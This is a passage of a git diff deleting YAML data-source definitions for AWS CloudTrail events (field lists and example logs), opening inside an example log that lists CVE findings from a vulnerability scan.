Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-19882", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "6.9"}]}, {"name": "CVE-2007-5686", "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts.  NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", "uri": "https://security-tracker.debian.org/tracker/CVE-2007-5686", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.9"}]}, {"name": "CVE-2013-4235", "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-4235", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "3.3"}]}, {"name": "CVE-2020-13529", "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-13529", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:A/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.9"}]}, {"name": "CVE-2013-4392", "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-4392", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "3.3"}]}, {"name": "CVE-2020-13776", "description": "systemd through v245 mishandles numerical
-  usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-13776", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "6.2"}]}, {"name": "CVE-2019-20386", "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-20386", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2019-9923", "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9923", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2005-2541", "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", "uri": "https://security-tracker.debian.org/tracker/CVE-2005-2541", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "10"}]}, {"name": "CVE-2021-20193", "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-20193", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-17973", "description": "** DISPUTED ** In LibTIFF 4.0.8, there is a heap-based use-after-free in the t2p_writeproc function in tiff2pdf.c. NOTE: there is a third-party report of inability to reproduce this issue.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-17973", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-35521", "description": "A flaw was found in libtiff. Due to a memory allocation failure in tif_read.c, a crafted TIFF file can lead to an abort, resulting in denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-35521", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2014-8130", "description": "The _TIFFmalloc function in tif_unix.c in LibTIFF 4.0.3 does not reject a zero size, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted TIFF image that is mishandled by the TIFFWriteScanline function in tif_write.c, as demonstrated by tiffdither.", "uri": "https://security-tracker.debian.org/tracker/CVE-2014-8130", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-5563", "description": "LibTIFF version 4.0.7 is vulnerable to a heap-based buffer over-read in tif_lzw.c resulting in DoS or code execution via a crafted bmp image to tools/bmp2tiff.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-5563", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-35522", "description": "In LibTIFF, there is a memory malloc failure in tif_pixarlog.c. A crafted TIFF document can lead to an abort, resulting in a remote denial of service attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-35522", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-9117", "description": "In LibTIFF 4.0.7, the program processes BMP images without verifying that biWidth and biHeight in the bitmap-information header match the actual input, leading to a heap-based buffer over-read in bmp2tiff.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-9117", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2017-16232", "description": "** DISPUTED ** LibTIFF 4.0.8 has multiple memory leak vulnerabilities, which allow attackers to cause a denial of service (memory consumption), as demonstrated by tif_open.c, tif_lzw.c, and tif_aux.c. NOTE: Third parties were unable to reproduce the issue.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16232", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2018-10126", "description": "LibTIFF 4.0.9 has a NULL pointer dereference in the jpeg_fdct_16x16 function in jfdctint.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-10126", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2021-22924", "description": "libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse, if one of them matches the setup.Due to errors in the logic, the config matching function did not take ''issuercert'' into account and it compared the involved paths *case insensitively*,which could lead to libcurl reusing wrong connections.File paths are, or can be, case sensitive on many systems but not all, and caneven vary depending on used file systems.The comparison also didn''t include the ''issuer cert'' which a transfer can setto qualify how to verify the server certificate.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22924", "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2021-38115", "description": "read_header_tga in gd_tga.c in the GD Graphics Library (aka LibGD) through 2.3.2 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted TGA file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-38115", "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"}, {"key": "package_name", "value": "libgd2"}]}, {"name": "CVE-2021-3618", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-3618", "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"}, {"key": "package_name", "value": "nginx"}]}], "findingSeverityCounts": {"HIGH": 2, "MEDIUM": 14, "INFORMATIONAL": 63, "LOW": 22, "UNDEFINED": 3}}}, "requestID": "23c19e2d-c48b-4265-b4eb-853e7b325780", "eventID": "6c94a9b2-36dc-43f8-a6dd-4ec839ded8af", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_GetAccountPasswordPolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_GetAccountPasswordPolicy.yml
deleted file mode 100644
index f24185b2f5..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_GetAccountPasswordPolicy.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: AWS CloudTrail GetAccountPasswordPolicy
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- desc
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDASBMSCQHHTH5NDF4GD", "arn": "arn:aws:iam::111111111111:user/strt_fonder", "accountId": "111111111111", "accessKeyId": "AKIASBMSCQHH5A5NJDM5", "userName": "strt_fonder"}, "eventTime": "2023-01-26T22:39:06Z", "eventSource": "iam.amazonaws.com", "eventName": "GetAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7", "userAgent": "aws-cli/2.7.25 Python/3.10.6 Darwin/21.6.0 source/x86_64 prompt/off command/iam.get-account-password-policy", "requestParameters": null, "responseElements": null, "requestID": "098fd0dd-e42e-4249-91fb-9637925bf2fe", "eventID": "5eb0fb9b-18ff-4be9-b90d-107a290e1d5c", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_GetObject.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_GetObject.yml
deleted file mode 100644
index c2ca9e8a5d..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_GetObject.yml
+++ /dev/null
@@ -1,85 +0,0 @@
-event_name: AWS CloudTrail GetObject
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.bucketName
-- requestParameters.key
-- requestParameters.x-amz-request-payer
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/console", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName": "console"}, "eventTime": "2023-04-11T01:18:47Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject", "awsRegion": "us-west-2", "sourceIPAddress": "12.26.0.38", "userAgent": "[aws-cli/2.11.2 Python/3.11.2 Darwin/22.3.0 exe/x86_64 prompt/off command/s3.cp]", "requestParameters": {"bucketName": "security-content", "Host": "security-content.s3.us-west-2.amazonaws.com", "x-amz-request-payer": "requester", "key": "stories/windows_discovery_techniques.yml"}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "dcha0yrujT+O4FHsYxHx48KxMk4+wtO7MaNRwFOFs46R1PynKWcCsbLScYEFytN+Vt35hyq1cek=", "bytesTransferredOut": 1136}, "requestID": "GVSEBM08Z93FB3BT", "eventID": "2b7231c2-892d-464e-8880-1e4f81ae7eb2", "readOnly": true, "resources": [{"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::security-content/stories/windows_discovery_techniques.yml"}, {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::security-content"}], "eventType": "AwsApiCall", "managementEvent": false, "recipientAccountId": "111111111111", "eventCategory": "Data", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "security-content.s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_GetPasswordData.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_GetPasswordData.yml
deleted file mode 100644
index 223f2d58a0..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_GetPasswordData.yml
+++ /dev/null
@@ -1,87 +0,0 @@
-event_name: AWS CloudTrail GetPasswordData
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- errorMessage
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- reason
-- recipientAccountId
-- region
-- requestID
-- requestParameters.instanceId
-- responseElements
-- result
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLP5AASA6I5:aws-go-sdk-1660169051746043000", "arn": "arn:aws:sts::111111111111:assumed-role/sample-role-used-by-stratus-for-ec2-password-data/aws-go-sdk-1660169051746043000", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLLY5RQXEF", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLP5AASA6I5", "arn": "arn:aws:iam::111111111111:role/sample-role-used-by-stratus-for-ec2-password-data", "accountId": "111111111111", "userName": "sample-role-used-by-stratus-for-ec2-password-data"}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-10T22:04:12Z", "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-10T22:04:13Z", "eventSource": "ec2.amazonaws.com", "eventName": "GetPasswordData", "awsRegion": "us-west-2", "sourceIPAddress": "142.254.89.27", "userAgent": "stratus-red-team_e3e4b259-63a4-4d89-acd5-a7286a279bb8", "errorCode": "Client.UnauthorizedOperation", "errorMessage": "You are not authorized to perform this operation. Encoded authorization failure message: OwnXKlWs2vtfsyXhkYTFO35PfDwIeH4oGadP2dmbdguXBDpSfP-65XwZU4JdWht_u8p9BlgIZ0QOYIzmm5-ApXc7HsgOynmQvF4vFNUxxiuY0w-VRNBiuPmphwnJqYln8pTJogn0DfcleY5TIuDEFwmGvZHnGMmK1kXJ1VcUiQvbK_vuDpSqIDFz-jqcnOTjzsC4DXlTZkHLL1HEeNVIjI9HCEWYG4CuG9Ti8BQ0AnGVkU8oqvtS6iyVlnPI9oId5_AWpfmE1ijhNKbgFH77DjRn6QyR5rGkGYYFpvaIyMvX33Vti4RzfAyJdpuzMgp6tV-q_Rbh0ikwBJvUtiiGfmqzdQynfRNDQmXJ3ruifOjGmUz34M90SGFJKi5CVHGThtO3UWj9EqYXpKdu_JgTYEqxWvRBopB--V7tOap8XKuz7W3rWyHN2clHA0yooLZ3DV34LWgzzDp9Iv66829HSTwGz7h2P0sGdCNuV_FCxwQzWYa8f6_h1By90MvWUvmEDLSzOfA_PF6BcqCmV8XBiPUvCMPebDSGmPwSa371J5Yn2xEiuQadfuNYRLZnd2i1V_NF9ax67BdZ", "requestParameters": {"instanceId": "i-7sap2krlslv6adrs"}, "responseElements": null, "requestID": "87368810-7b30-4ff9-b097-702778a53f22", "eventID": "0cdd3757-296a-4454-9619-d0f8be335081", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_JobCreated.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_JobCreated.yml
deleted file mode 100644
index cbca0ff2f0..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_JobCreated.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-event_name: AWS CloudTrail JobCreated
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- desc
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestParameters
-- responseElements
-- serviceEventDetails.jobArn
-- serviceEventDetails.jobEventId
-- serviceEventDetails.jobId
-- serviceEventDetails.status
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- userAgent
-- userIdentity.accountId
-- userIdentity.invokedBy
-- user_agent
-- user_group_id
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"accountId": "111111111111", "invokedBy": "s3.amazonaws.com"}, "eventTime": "2023-04-24T23:51:17Z", "eventSource": "s3.amazonaws.com", "eventName": "JobCreated", "awsRegion": "us-west-2", "sourceIPAddress": "s3.amazonaws.com", "userAgent": "s3.amazonaws.com", "requestParameters": null, "responseElements": null, "eventID": "894153ad-ed86-4719-bb66-6c52ef7dc767", "readOnly": false, "eventType": "AwsServiceEvent", "managementEvent": true, "recipientAccountId": "111111111111", "serviceEventDetails": {"jobId": "bb54efd8-937d-4f0c-967d-aa8443998dac", "jobArn": "arn:aws:s3:us-west-2:111111111111:job/bb54efd8-937d-4f0c-967d-aa8443998dac", "status": "New", "jobEventId": "4e70d2f1053c07a79d9be9a14e486020", "failureCodes": [], "statusChangeReason": []}, "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyDBInstance.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyDBInstance.yml
deleted file mode 100644
index e604221b36..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyDBInstance.yml
+++ /dev/null
@@ -1,135 +0,0 @@
-event_name: AWS CloudTrail ModifyDBInstance
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.allowMajorVersionUpgrade
-- requestParameters.applyImmediately
-- requestParameters.dBInstanceIdentifier
-- requestParameters.deletionProtection
-- requestParameters.masterUserPassword
-- responseElements.allocatedStorage
-- responseElements.autoMinorVersionUpgrade
-- responseElements.availabilityZone
-- responseElements.backupRetentionPeriod
-- responseElements.backupTarget
-- responseElements.cACertificateIdentifier
-- responseElements.copyTagsToSnapshot
-- responseElements.customerOwnedIpEnabled
-- responseElements.dBInstanceArn
-- responseElements.dBInstanceClass
-- responseElements.dBInstanceIdentifier
-- responseElements.dBInstanceStatus
-- responseElements.dBParameterGroups{}.dBParameterGroupName
-- responseElements.dBParameterGroups{}.parameterApplyStatus
-- responseElements.dBSubnetGroup.dBSubnetGroupDescription
-- responseElements.dBSubnetGroup.dBSubnetGroupName
-- responseElements.dBSubnetGroup.subnetGroupStatus
-- responseElements.dBSubnetGroup.subnets{}.subnetAvailabilityZone.name
-- responseElements.dBSubnetGroup.subnets{}.subnetIdentifier
-- responseElements.dBSubnetGroup.subnets{}.subnetStatus
-- responseElements.dBSubnetGroup.vpcId
-- responseElements.dbInstancePort
-- responseElements.dbiResourceId
-- responseElements.deletionProtection
-- responseElements.endpoint.address
-- responseElements.endpoint.hostedZoneId
-- responseElements.endpoint.port
-- responseElements.engine
-- responseElements.engineVersion
-- responseElements.enhancedMonitoringResourceArn
-- responseElements.httpEndpointEnabled
-- responseElements.iAMDatabaseAuthenticationEnabled
-- responseElements.instanceCreateTime
-- responseElements.kmsKeyId
-- responseElements.latestRestorableTime
-- responseElements.licenseModel
-- responseElements.masterUsername
-- responseElements.monitoringInterval
-- responseElements.monitoringRoleArn
-- responseElements.multiAZ
-- responseElements.networkType
-- responseElements.optionGroupMemberships{}.optionGroupName
-- responseElements.optionGroupMemberships{}.status
-- responseElements.pendingModifiedValues.masterUserPassword
-- responseElements.performanceInsightsEnabled
-- responseElements.performanceInsightsKMSKeyId
-- responseElements.performanceInsightsRetentionPeriod
-- responseElements.preferredBackupWindow
-- responseElements.preferredMaintenanceWindow
-- responseElements.publiclyAccessible
-- responseElements.storageEncrypted
-- responseElements.storageThroughput
-- responseElements.storageType
-- responseElements.vpcSecurityGroups{}.status
-- responseElements.vpcSecurityGroups{}.vpcSecurityGroupId
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WP4HD6:gowthamarajr@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/gowthamarajr@splunk.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLAKJDBQGB", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-05T08:47:55Z", "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-05T09:19:15Z", "eventSource": "rds.amazonaws.com", "eventName": "ModifyDBInstance", "awsRegion": "us-west-2", "sourceIPAddress": "AWS Internal", "userAgent": "AWS Internal", "requestParameters": {"dBInstanceIdentifier": "database-1", "applyImmediately": true, "masterUserPassword": "****", "allowMajorVersionUpgrade": false, "deletionProtection": true}, "responseElements": {"dBInstanceIdentifier": "database-1", "dBInstanceClass": "db.m6g.large", "engine": "postgres", 